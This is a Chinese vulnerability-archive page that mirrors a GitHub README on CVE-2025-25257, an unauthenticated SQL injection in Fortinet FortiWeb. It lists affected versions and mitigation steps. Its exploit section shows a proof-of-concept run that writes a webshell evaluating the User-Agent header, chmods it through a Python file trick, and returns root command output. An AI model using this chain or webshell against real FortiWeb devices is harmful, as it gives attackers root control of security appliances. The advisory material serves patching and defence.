关联漏洞
标题:
Fortinet FortiWeb SQL注入漏洞
(CVE-2025-25257)
描述:Fortinet FortiWeb是美国飞塔(Fortinet)公司的一款Web应用层防火墙,它能够阻断如跨站点脚本、SQL注入、Cookie中毒、schema中毒等攻击的威胁,保证Web应用程序的安全性并保护敏感的数据库内容。 Fortinet FortiWeb 7.6.3及之前版本、7.4.7及之前版本、7.2.10及之前版本和7.0.10之前版本存在SQL注入漏洞,该漏洞源于对SQL命令中特殊元素中和不当,可能导致SQL注入攻击。
描述
CVE-2025-25257
介绍
# CVE-2025-25257 — FortiWeb Critical SQL Injection Vulnerability 🔥
<img width="665" height="375" alt="bug-removebg-preview" src="https://github.com/user-attachments/assets/57839369-cdde-4166-ba13-cf5a9ff978ad" />
### 🧠 Overview:
* **Vulnerability Type**: Unauthenticated **SQL Injection**
* **Component Affected**: FortiWeb GUI / Fabric Connector API
* **CVSS Score**: **9.6 – 9.8 (Critical)**
* **CWE**: CWE-89 – Improper Neutralization of Special Elements in SQL Commands
* **Discovered & Patched**: July 2025
* **Exploitation Status**: Proof-of-concept publicly available; exploitation expected
---
### 🛠 Affected Versions:
| FortiWeb Version | Affected Range | Fixed Version |
| ---------------- | --------------- | --------------- |
| 7.6 | 7.6.0 to 7.6.3 | 7.6.4 or later |
| 7.4 | 7.4.0 to 7.4.7 | 7.4.8 or later |
| 7.2 | 7.2.0 to 7.2.10 | 7.2.11 or later |
| 7.0 | 7.0.0 to 7.0.10 | 7.0.11 or later |
---
### 🚨 Technical Details:
* The vulnerability allows attackers to **inject SQL** into HTTP/S requests without any login.
* One of the vulnerable endpoints is `/api/fabric/device/status`, where SQL payloads in the `Authorization: Bearer` header can be executed.
* Potential impact includes **full database compromise**, **data theft**, or **remote code execution** via `SELECT … INTO OUTFILE` or similar techniques.
---
### 🔐 Risk:
* **Attack Vector**: Remote, no authentication required
* **Impact**: Full access to FortiWeb backend DB, possible system compromise
* **Threat Level**: **Critical** — especially since FortiWeb is a security appliance
---
### 🧩 Mitigation Steps:
1. **Patch immediately** to the fixed version corresponding to your FortiWeb release.
2. **Restrict or disable HTTP/HTTPS access** to the management interface temporarily.
3. **Monitor logs** for suspicious API calls or Bearer token injections.
4. **Audit internet-facing FortiWeb appliances** and isolate if unpatched.
---
### ✅ TL;DR:
* CVE-2025-25257 is a **critical unauthenticated SQL injection** in FortiWeb.
* Patch now to versions: **7.6.4+, 7.4.8+, 7.2.11+, or 7.0.11+**.
* If unpatched, disable external access to the management GUI.
* Exploitation is likely—treat this as a top priority.
---
### 💀 Exploit:
<img width="1920" height="958" alt="bug1" src="https://github.com/user-attachments/assets/fb8db3c1-e26f-46d4-a247-f7a44f7d332e" />
```
┌──(kali㉿kali)-[~]
└─$ sudo python3 CVE-2025-25257.py -t https://10.10.10.10:9443/
[*] writing part #!/bin/sh --
p
[*] writing part rintf "Content-T
[*] writing part ype: text/html\r
[*] writing part \n";printf "\r\n
[*] writing part ";eval $HTTP_USE
[*] writing part R_AGENT
[>] writing webshell file
[*] writing part import os #
os
[*] writing part .system('chmod +
[*] writing part x /migadmin/cgi-
[*] writing part bin/x.cgi && rm
[*] writing part -f /var/log/lib/
[*] writing part python3.10/pylab
[*] writing part .py') #
[>] cooking chmod gadget
[*] triggering chmod
[*] executing `id` ...
uid=0(root) gid=0 groups=0
[*] webshell available at:
> https://10.10.10.10:9443/cgi-bin/x.cgi
provide command via the `User-Agent` header!)
```
---
### ⚠️ Disclaimer:
This information is provided for **educational and defensive security purposes only**. Any actions taken using this knowledge must comply with **all applicable laws and ethical standards**. Unauthorized exploitation of systems without explicit permission is **illegal and unethical**. The author assumes **no responsibility** for any misuse or damage resulting from the use of this content.
文件快照
[4.0K] /data/pocs/0a52edf415200ce3a880fe47b80c2114eb06651e
├── [4.4K] CVE-2025-25257.py
└── [3.6K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。